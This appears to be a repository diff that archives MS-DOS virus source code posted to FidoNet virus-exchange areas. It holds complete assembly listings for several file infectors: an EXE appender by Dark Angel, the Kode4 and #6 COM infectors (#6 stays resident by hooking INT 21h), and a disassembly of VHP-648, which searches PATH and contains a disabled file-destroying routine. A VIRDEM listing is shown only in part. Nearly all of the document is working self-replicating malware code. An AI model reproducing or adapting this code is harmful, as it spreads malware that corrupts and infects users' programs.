pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
movsw
mov ah,1Ah ; Set new DTA
lea dx,[bp+newDTA] ; new DTA @ DS:DX
int 21h
lea dx,[bp+exe_mask]
mov ah,4eh ; find first file
mov cx,7 ; any attribute
findfirstnext:
int 21h ; DS:DX points to mask
jc done_infections ; No mo files found
mov al,0h ; Open read only
call open
mov ah,3fh ; Read file to buffer
lea dx,[bp+buffer] ; @ DS:DX
mov cx,1Ah ; 1Ah bytes
int 21h
mov ah,3eh ; Close file
int 21h
checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected?
jnz infect_exe
find_next:
mov ah,4fh ; find next file
jmp short findfirstnext
done_infections:
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
pop es
pop ds ; DS->PSP
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[si+jmpsave+2],ax
add ax,word ptr cs:[si+stacksave+2]
cli ; Clear intrpts for stack manip.
mov sp,word ptr cs:[si+stacksave]
mov ss,ax
sti
db 0eah ; jmp ssss:oooo
jmpsave dd ? ; Original CS:IP
stacksave dd ? ; Original SS:SP
jmpsave2 dd 0fff00000h ; Needed for carrier file
stacksave2 dd ?
creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0
virusname db '[DemoEXE] for 40Hex',0
infect_exe:
les ax, dword ptr [bp+buffer+14h] ; Save old entry point
mov word ptr [bp+jmpsave2], ax
mov word ptr [bp+jmpsave2+2], es
les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
mov word ptr [bp+stacksave2], es
mov word ptr [bp+stacksave2+2], ax
mov ax, word ptr [bp+buffer + 8] ; Get header size
mov cl, 4 ; convert to bytes
shl ax, cl
xchg ax, bx
les ax, [bp+offset newDTA+26]; Get file size
mov dx, es ; to DX:AX
push ax
push dx
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
mov cx, 10h ; Convert to segment:offset
div cx ; form
mov word ptr [bp+buffer+14h], dx ; New entry point
mov word ptr [bp+buffer+16h], ax
mov word ptr [bp+buffer+0Eh], ax ; and stack
mov word ptr [bp+buffer+10h], id
pop dx ; get file length
pop ax
add ax, heap-startvirus ; add virus size
adc dx, 0
mov cl, 9 ; 2**9 = 512
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax ; filesize in pages
pop ax
and ah, 1 ; mod 512
mov word ptr [bp+buffer+4], dx ; new file size
mov word ptr [bp+buffer+2], ax
push cs ; restore ES
pop es
mov cx, 1ah
finishinfection:
push cx ; Save # bytes to write
xor cx,cx ; Clear attributes
call attributes ; Set file attributes
mov al,2
call open
mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Write from buffer
pop cx ; cx bytes
int 21h
mov ax,4202h ; Move file pointer
xor cx,cx ; to end of file
cwd ; xor dx,dx
int 21h
mov ah,40h ; Concatenate virus
lea dx,[bp+startvirus]
mov cx,heap-startvirus ; # bytes to write
int 21h
mov ax,5701h ; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] ; time
mov dx,word ptr [bp+newDTA+18h] ; date
int 21h
mov ah,3eh ; Close file
int 21h
mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
call attributes ; attributes
mo_infections: jmp find_next
open:
mov ah,3dh
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
xchg ax,bx
ret
attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
ret
exe_mask db '*.exe',0
heap: ; Variables not in code
newDTA db 42 dup (?) ; Temporary DTA
buffer db 1ah dup (?) ; read buffer
endheap: ; End of virus
end startvirus
;-+- CrossPoint v3.02
; + Origin: Data Fellows BBS (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/i Initialize all segments
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

222
MSDOS/Virus.MSDOS.Unknown.vir63.asm Normal file
View File

@ -0,0 +1,222 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 53 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : KOD4_399.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mark Hapershaw, 2:283/718 (06 Nov 94 17:58)
;* To : Mikko Hypponen
;* Subj : KOD4_399.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mark.Hapershaw@f718.n283.z2.fidonet.org
;ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92
;
;Article Title: Kode 4 v2 Virus
;Author: Soltan Griss
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
V_Length equ vend-vstart
KODE4 proc far
start label near
db 0E9h,00h,00h
vstart equ $
mov si,100h ;get si to point to 100
mov di,102h ;get di to point to 102
lback: inc di ;increment di
mov ax,word ptr [si] ;si is ponting to ax
cmp word ptr [di],ax ;compare ax with di loc
jne lback ;INE go back and inc di
mov ax,word ptr [si+1]
cmp ax,word ptr [di+1]
je lout
jmp lback
lout: add di,3h ;jmp stored in the end
sub di,(v_length+100h) ;+3 to get to end and -
mov si,di ;
;**********************************************************************
;*
;* The above code can be re-written as follows...
;* The above idea, although it works is very long in code....
;* when DOS does a load and execute it pushes all registers the last
;* register to be pushed contains the file length. so just subtract
;* the current location
;**********************************************************************
;
;
;
;Host_Off: pop bp
; sub bp,offset host_off
; mov si,bp
;
;*** Before opening any file copy the original three bytes back to 100h
;*** Because they will get overwritten when you check any new files
lea di,temp_buff
add di,si
mov ax,word ptr [di]
mov cl,byte ptr [di+2]
mov di,100h
mov word ptr [di],ax
mov byte ptr [di+2],cl
mov ah,4Eh ;Find first Com file
mov dx,offset filename ; offset of "*.com"
add dx,si
int 21h
jnc back
jmp done
Back:
mov ah,43h ;get rid of read only
mov al,0
mov dx,9eh
int 21h
mov ah,43h
mov al,01
and cx,11111110b
int 21h
mov ax,3D02h ;Open file for read/writing
mov dx,9Eh ;get file name from file DTA
int 21h
jnc next
jmp done
next: mov bx,ax ;save handle in bx
mov ah,57h ;get time date
mov al,0
int 21h
push cx ;put in stack for later
push dx
mov ax,4200h ; Move ptr to start of file
xor cx,cx
xor dx,dx
int 21h
mov ah,3fh ;load first 3 bytes
mov cx,3
mov dx,offset temp_buff
add dx,si
int 21h
xor cx,cx ;move file pointer to end of file
xor dx,dx
mov ax,4202h
int 21h
sub ax,3 ; Fix for real location
push ax
; nop ;
; nop ; used for debugging
; nop ;
; nop ;
; nop
mov di,offset temp_buff
add di,si
mov word ptr [j_code2+si],ax; Save two bytes in a
; word [jumpin]
cmp byte ptr [di],0e9h ;look for a jmp at begining
jne infect
mov cx,word ptr [di+1] ;check for XXX bytes at end
pop ax
sub ax,v_length
cmp ax, cx ; jump (id string to check)
jne infect
jmp finish
infect:
xor cx,cx ;move file pointer to begining
xor dx,dx ;to write jump
mov ax,4200h
int 21h
mov ah,40h ;write jump in first 3 bytes
mov cx,3
mov dx, offset j_code1
add dx,si
int 21h
xor cx,cx ;move file pointer to end of file
xor dx,dx
mov ax, 4202h
int 21h
mov dx,offset vstart
add dx,si ;Start writing at top of virus
mov cx,(vend-vstart) ; Set for length of virus
mov ah,40h ;Write Data into the file
int 21h
Finish: pop dx ;Restore old dates and times
pop cx
mov ah,57h
mov al,01h
int 21h
mov ah,3Eh ;Close the file
int 21h
mov ah,4Fh ;Find Next file
int 21h
jc done
jmp back
done:
mov bp,100h
jmp bp
filename db "*.com",0
DATA db " -=+ Kode4 +=-, The one and ONLY!$"
j_code1 db 0e9h
j_code2 db 00h,00h
temp_buff db 0cdh,020h,090h ; CD 20 NOP
kode4 endp
vend equ $
seg_a ends
end start
;-+- WM v2.09/91-0245
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/3 Enable 32-bit processing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

395
MSDOS/Virus.MSDOS.Unknown.vir64.asm Normal file
View File

@ -0,0 +1,395 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 49 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : NUMBER_6.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Ron Toler, 2:283/718 (06 Nov 94 17:56)
;* To : Fred Lee
;* Subj : NUMBER_6.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org
;*****************************************************************************
; #6 Virus *
; *
; Assembled with Tasm 2.5 *
; (c) 1992 Trident/Dark Helmet, The Netherlands *
; *
; The author(s) take(s) no responsibility for any damaged caused by *
; this virus. *
;*****************************************************************************
.RADIX 16
virus SEGMENT
MODEL SMALL
ASSUME cs:virus, ds:virus, es:virus
ORG 100h
len EQU OFFSET last - begin
dummy: DB 0e9h,02h,00h,86h,54h ; Jump to start of
; viruscode.
begin: CALL start ; make a call to
; push the IP on the
; stack.
start: POP bp ; get the IP of the
; stack.
SUB bp,108h ; adjust BP (=IP)
; for offset of DATA.
restore: MOV di,0100h ; copy the original
LEA si,ds:[carrier_begin+bp] ; host begin code back.
MOV cx,05h
REP MOVSB
check: MOV ah,0a0h ; check if virus
INT 21h ; allready resident.
CMP ax,8654h
JE end_virus
memory: MOV ax,cs ; DS = Memory Control
DEC ax ; Blok (MCB).
MOV ds,ax
CMP BYTE PTR ds:[0000],5ah ; check first byte if
JNE abort ; last MCB.
MOV ax,ds:[0003] ; decrease memory size.
SUB ax,40
MOV ds:[0003],AX
PUSH cs ; restore ds.
POP ds
install: MOV bx,ax ; ES point where
MOV ax,es ; to copy virus in
ADD ax,bx ; memory.
MOV es,ax
MOV cx,len ; copy virus to
LEA si,ds:[begin+bp] ; memory.
LEA di,es:0105 ; offset = 105
REP MOVSB
MOV [virus_segment+bp],es ; store virus_segment
PUSH cs ; restore es
POP es
hook_vectors: CLI
MOV ax,3521h ; hook int 21h
INT 21h
MOV ds,[virus_segment+bp]
MOV old_21h,bx
MOV old_21h+2,es
MOV dx,offset main_virus
MOV ax,2521h
INT 21h
MOV ax,3512h ; hook int 12h
INT 21h
MOV old_12h,bx
MOV old_12h+2,es
MOV dx,offset new_12h
MOV ax,2512h
INT 21h
STI
abort: MOV ax,cs ; restore ds,es
MOV ds,ax
MOV es,ax
end_virus: MOV bx,0100h ; jump to begin host
PUSH bx
XOR bx,bx
XOR bp,bp
XOR ax,ax
XOR cx,cx
RET
;*****************************************************************************
; *
; This part will intercept the interuptvectors and copy itself to *
; other host programs *
; *
;*****************************************************************************
main_virus: PUSHF
CMP ah,0a0h ; check if virus calls
JNE new_21h ; and return id.
MOV ax,8654h
POPF
IRET
new_21h: PUSH ds ; new interupt 21
PUSH es ; routine
PUSH di
PUSH si
PUSH ax
PUSH bx
PUSH cx
PUSH dx
PUSH sp
PUSH bp
check_open: CMP ah,3dh ; check if a file is
JNE check_exec ; being opened
JMP chk_com
check_exec: CMP ax,04b00h ; check if a file is
JNE continu ; executed
JMP chk_com
continu: POP bp
POP sp
POP dx ; continu with
POP cx ; interrupt
POP bx
POP ax
POP si
POP di
POP es
POP ds
POPF
JMP DWORD PTR cs:[old_21h]
chk_com: MOV cs:[name_seg],ds
MOV cs:[name_off],dx
CLD ; check if extension
MOV di,dx ; is COM file
PUSH ds
POP es
MOV al,'.'
REPNE SCASB
CMP WORD PTR es:[di],'OC'
JNE continu
CMP WORD PTR es:[di+2],'M'
JNE continu
CMP WORD PTR es:[di-7],'MO' ; Check for
JNE error ; COMMAND.COM
CMP WORD PTR es:[di-5],'AM'
JNE error
CMP WORD PTR es:[di-3],'DN'
JE continu
error: CALL int24h ; take care of error
; messages
CALL set_atribute ; set atribute for
; writing
open_file: MOV ds,cs:[name_seg] ; open file
MOV dx,cs:[name_off]
MOV ax,3d02h
CALL do_int21h
JC close_file
PUSH cs
POP ds
MOV [handle],ax
MOV bx,ax
CALL get_date
check_infect: PUSH CS ; check if file
POP DS ; already infect
MOV BX,[handle]
MOV ah,3fh
MOV cx,05h
LEA dx,[carrier_begin]
CALL do_int21h
MOV al, BYTE PTR [carrier_begin]+3 ; look for
MOV ah, BYTE PTR [carrier_begin]+4 ; identification byte's
CMP ax,[initials]
JE save_date
get_lenght: MOV ax,4200h
CALL move_pointer
MOV ax,4202h
CALL move_pointer
SUB AX,03h
MOV [lenght_file],ax
CALL write_jmp ; write jump
; instruction.
CALL write_virus ; write virus
; body.
save_date: PUSH CS
POP DS
MOV bx,[handle]
MOV dx,[date]
MOV cx,[time]
MOV ax,5701h
CALL do_int21h
close_file: MOV bx,[handle] ; close file
MOV ah,3eh
CALL do_int21h
restore_int24h: MOV dx,cs:[old_24h] ; restore int24
MOV ds,cs:[old_24h+2] ; for critical
MOV ax,2524h ; error handling
CALL do_int21h
JMP continu
new_24h: MOV al,3
IRET
new_12h: JMP DWORD PTR cs:[old_12h]
SUB ax,50
IRET
;*****************************************************************************
move_pointer: PUSH cs
POP ds
MOV bx,[handle]
XOR cx,cx
XOR dx,dx
CALL do_int21h
RET
do_int21h: PUSHF
CALL DWORD PTR cs:[old_21h]
RET
write_jmp: PUSH CS
POP DS
MOV ax,4200h ; write jump
CALL move_pointer ; instruction
MOV ah,40h
MOV cx,01h
LEA dx,[jump]
CALL do_int21h
MOV ah,40h ; write offset of
MOV cx,02h ; jump
LEA dx,[lenght_file]
CALL do_int21h
MOV ah,40h ; write mark for
MOV cx,02h ; infection
LEA dx,[initials]
CALL do_int21h
RET
write_virus: PUSH CS
POP DS
MOV ax,4202h ; write main
CALL move_pointer ; virus body
MOV ah,40 ; at end of
MOV cx,len ; program
MOV dx,105h
CALL do_int21h
RET
get_date: MOV ax,5700h
CALL do_int21h
PUSH cs
POP ds
MOV [date],dx
MOV [time],cx
RET
int24h: MOV ax,3524h
CALL do_int21h
MOV cs:[old_24h],bx
MOV cs:[old_24h+2],es
MOV dx,offset new_24h
PUSH CS
POP DS
MOV AX,2524h
; * Message split, to be continued *
;-+- GEcho 1.00
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/d Warn if duplicate symbols in libraries
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 50 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : [part 2] NUMBER_6.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Ron Toler, 2:283/718 (06 Nov 94 17:56)
;* To : Fred Lee
;* Subj : [part 2] NUMBER_6.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org
; * Continuation 1 of a split message *
CALL do_int21h
RET
set_atribute: MOV ax,4300h ; get atribute
MOV ds,cs:[name_seg]
MOV dx,cs:[name_off]
CALL do_int21h
AND cl,0feh ; set atribute
MOV ax,4301h
CALL do_int21h
RET
;*****************************************************************************
text db '#6 Virus, Trident/The Netherlands 1992'
old_12h dw 00h,00h
old_21h dw 00h,00h
old_24h dw 00h,00h
carrier_begin db 090h,0cdh,020h,086h,054h
jump db 0e9h
name_seg dw ?
name_off dw ?
virus_segment dw ?
handle dw ?
lenght_file dw ?
date dw ?
time dw ?
initials dw 5486h
last db 090h
virus ends
end dummy
;-+- GEcho 1.00
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/dSYM[=VAL] Define symbol SYM = 0, or = value VAL
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)


331
MSDOS/Virus.MSDOS.Unknown.virbub.asm Normal file
View File

@ -0,0 +1,331 @@
name Virus
title Disassembly listing of the VHP-648 virus
.radix 16
code segment byte public
assume cs:code,ds:code,es:code
org 100h
environ equ 2C
start:
jmp virus
message db 'Hello, world!$'
mov ah,9
mov dx,offset message
int 21
int 20
virus:
push cx ;Save CX
mov dx,offset data ;Restore original first instruction
modify equ $-2 ;The instruction above is changed
; before each contamination
cld
mov si,dx
add si,saveins-data ;Instruction saved there
mov di,offset start
mov cx,3 ;Move 3 bytes
rep movsb ;Do it
mov si,dx ;Keep SI pointed at data
mov ah,30 ;Get DOS version
int 21
cmp al,0 ;Less than 2.0?
jne skip1
jmp exit ;Exit if so
skip1:
push es ;Save ES
mov ah,2F ;Get current DTA in ES:BX
int 21
mov word ptr [si+0],bx ;dtaadr
mov word ptr [si+2],es
pop es ;Restore ES
mov dx,mydta-data
add dx,si
mov ah,1A ;Set DTA
int 21
push es ;Save ES & SI
push si
mov es,ds:[environ] ;Environment address
mov di,0
n_00015A: ;Search 'PATH' in environment
pop si ;Restore data offset in SI
push si
add si,pathstr-data
lodsb
mov cx,8000 ;Maximum 32K in environment
repnz scasb ;Search for first letter ('P')
mov cx,4 ;4 letters in 'PATH'
n_000169:
lodsb ;Search for next char
scasb
jne n_00015A ;If not found, search for next 'P'
loop n_000169 ;Loop until done
pop si ;Restore SI & ES
pop es
mov [si+16],di ;Save 'PATH' offset in poffs
mov di,si
add di,fname-data ;Point SI & DI at '=' sign
mov bx,si ;Point BX at data area
add si,fname-data
mov di,si
jmp short n_0001BF
n_000185:
cmp word ptr [si+16],6C ;poffs
jne n_00018F
jmp olddta
n_00018F:
push ds
push si
mov ds,es:[environ]
mov di,si
mov si,es:[di+16] ;poffs
add di,fname-data
n_0001A1:
lodsb
cmp al,';'
je n_0001B0
cmp al,0
je n_0001AD
stosb
jmp n_0001A1
n_0001AD:
mov si,0
n_0001B0:
pop bx
pop ds
mov [bx+16],si ;poffs
cmp byte ptr [di-1],'\'
je n_0001BF
mov al,'\' ;Add '\' if not already present
stosb
n_0001BF:
mov [bx+18],di ;Save '=' offset in eqoffs
mov si,bx ;Restore data pointer in SI
add si,allcom-data
mov cx,6 ;6 bytes in ASCIIZ '*.COM'
rep movsb ;Move '*.COM' at fname
mov si,bx ;Restore SI
mov ah,4E ;Find first file
mov dx,fname-data
add dx,si
mov cx,11b ;Hidden, Read/Only or Normal files
int 21
jmp short n_0001E3
findnext:
mov ah,4F ;Find next file
int 21
n_0001E3:
jnc n_0001E7 ;If found, try to contaminate it
jmp n_000185 ;Otherwise search in another directory
n_0001E7:
mov ax,[si+75] ;Check file time
and al,11111b ; (the seconds, more exactly)
cmp al,62d/2 ;Are they 62?
;If so, file is already contains the virus, search for another:
je findnext
cmp [si+79],64000d ;Is file size greather than 64,000 bytes?
ja findnext ;If so, search for next file
cmp word ptr [si+79],10d ;Is file size less than 10 bytes?
jb findnext ;If so, search for next file
mov di,[si+18] ;eqoffs
push si ;Save SI
add si,namez-data ;Point SI at namez
n_000209:
lodsb
stosb
cmp al,0
jne n_000209
pop si ;Restore SI
mov ax,4300 ;Get file attributes
mov dx,fname-data
add dx,si
int 21
mov [si+8],cx ;Save them in fattrib
mov ax,4301 ;Set file attributes
;The next `db's are there because MASM can't assemble
; the instruction `and cx,0FFFE' correctly (the fool!):
db 081,0E1,0FE,0FF
; and cx,word ptr (not 1) ;Turn off Read Only flag
mov dx,fname-data
add dx,si
int 21
mov ax,3D02 ;Open file with Read/Write access
mov dx,fname-data
add dx,si
int 21
jnc n_00023E
jmp oldattr ;Exit on error
n_00023E:
mov bx,ax ;Save file handle in BX
mov ax,5700 ;Get file date & time
int 21
mov [si+4],cx ;Save time in ftime
mov [si+6],dx ;Save date in fdate
mov ah,2C ;Get system time
int 21
and dh,111b ;Are seconds a multiple of 8?
;If so, destroy file (don't contaminate). Now this code is disabled.
jnz 010
jmp short n_000266 ;CHANGED. Was jnz here
;Destroy file by rewriting an illegal jmp as first instruction:
mov ah,40 ;Write to file handle
mov cx,5 ;Write 5 bytes
mov dx,si
add dx,bad_jmp-data ;Write THESE bytes
int 21 ;Do it
jmp short oldtime ;Exit
;Try to contaminate file:
;Read first instruction of the file (first 3 bytes) and save it in saveins:
n_000266:
mov ah,3F ;Read from file handle
mov cx,3 ;Read 3 bytes
mov dx,saveins-data ;Put them there
add dx,si
int 21
jc oldtime ;Exit on error
cmp ax,3 ;Are really 3 bytes read?
jne oldtime ;Exit if not
;Move file pointer to end of file:
mov ax,4202 ;LSEEK from end of file
mov cx,0 ;0 bytes from end
mov dx,0
int 21
jc oldtime ;Exit on error
mov cx,ax ;Get the value of file pointer
sub ax,3 ;Subtract 3 from it to get real code size
mov [si+14d],ax ;Save result in filloc
add cx,data-(virus-100)
mov di,si
sub di,data-modify ;A little self-modification
mov [di],cx
mov ah,40 ;Write to file handle
mov cx,enddata-virus ;Virus code length as bytes to be written
mov dx,si
sub dx,data-virus ;Now DX points at virus label
int 21
jc oldtime ;Exit on error
cmp ax,enddata-virus ;Are all bytes written?
jne oldtime ;Exit if not
mov ax,4200 ;LSEEK from the beginning of the file
mov cx,0 ;Just at the file beginning
mov dx,0
int 21
jc oldtime ;Exit on error
;Rewrite the first instruction of the file with a jump to the virus code:
mov ah,40 ;Write to file handle
mov cx,3 ;3 bytes to write
mov dx,si
add dx,newjmp-data ;Write THESE bytes
int 21
oldtime:
mov dx,[si+6] ;Restore file date
mov cx,[si+4] ; and time
;And these again are due to the MASM 5.0 foolness:
db 081,0E1,0E0,0FF
db 081,0C9,01F,000
; and cx,not 11111b
; or cx,11111b ;Set seconds to 62 (?!)
mov ax,5701 ;Set file date & time
int 21
mov ah,3E ;Close file handle
int 21
oldattr:
mov ax,4301 ;Set file attributes
mov cx,[si+8] ;They were saved in fattrib
mov dx,fname-data
add dx,si
int 21
olddta:
push ds ;Save DS
mov ah,1A ;Set DTA
mov dx,[si+0] ;Restore saved DTA
mov ds,[si+2]
int 21
pop ds ;Restore DS
exit:
pop cx ;Restore CX
xor ax,ax ;Clear registers
xor bx,bx
xor dx,dx
xor si,si
mov di,100 ;Jump to CS:100
push di ; by doing funny RET
xor di,di
ret -1
data label byte ;Data section
dtaaddr dd ? ;Disk Transfer Address
ftime dw ? ;File date
fdate dw ? ;File time
fattrib dw ? ;File attribute
saveins db 0EBh,0Fh,90 ;Original first 3 bytes
newjmp db 0E9 ;Code of jmp instruction
filloc dw ? ;File pointer is saved here
allcom db '*.COM',0 ;Filespec to search for
poffs dw ? ;Address of 'PATH' string
eqoffs dw ? ;Address of '=' sign
pathstr db 'PATH='
fname db 40 dup (' ') ;Path name to search for
;Disk Transfer Address for Find First / Find Next:
mydta label byte
drive db ? ;Drive to search for
pattern db 13d dup (?) ;Search pattern
reserve db 7 dup (?) ;Not used
attrib db ? ;File attribute
time dw ? ;File time
date dw ? ;File date
fsize dd ? ;File size
namez db 13d dup (?) ;File name found
;This replaces the first instruction of a destroyed file:
bad_jmp db 0EA,0Bh,2,13,58
enddata label byte
code ends
end start


487
MSDOS/Virus.MSDOS.Unknown.virdem.asm Normal file
View File

@ -0,0 +1,487 @@
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ VIRDEM ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 16-Mar-87 ÛÛ
;ÛÛ Version: ÛÛ
;ÛÛ Passes: 5 Analysis Options on: QRS ÛÛ
;ÛÛ Copyright by R.Burger 1986,1987 ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 80h ; (8C04:0080=0)
data_2e equ 9Eh ; (8C04:009E=0)
data_16e equ 0F800h ; (8C04:F800=0)
data_17e equ 0FD00h ; (8C04:FD00=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
virdem proc far
start:
nop
nop
nop
mov sp,0FE00h
push ax
push bx
push cx
push dx
push bp
push si
push di
push ds
push es
push ss
pushf ; Push flags
mov si,data_1e ; (8C04:0080=0)
lea di,cs:[3BFh] ; Load effective addr
mov cx,20h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ax,0
mov es:data_5,ax ; (8C04:038F=0)
mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h)
cmp bl,39h ; '9'
je loc_1 ; Jump if equal
inc bl
loc_1: ; xref 8C04:012C
mov byte ptr es:data_12+0Dh,bl ; (8C04:0422=30h)
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov cs:data_10,al ; (8C04:03E1=0)
mov ah,47h ; 'G'
mov dh,0
add al,1
mov dl,al
lea si,cs:[3E3h] ; Load effective addr
int 21h ; DOS Services ah=function 47h
; get present dir,drive dl,1=a:
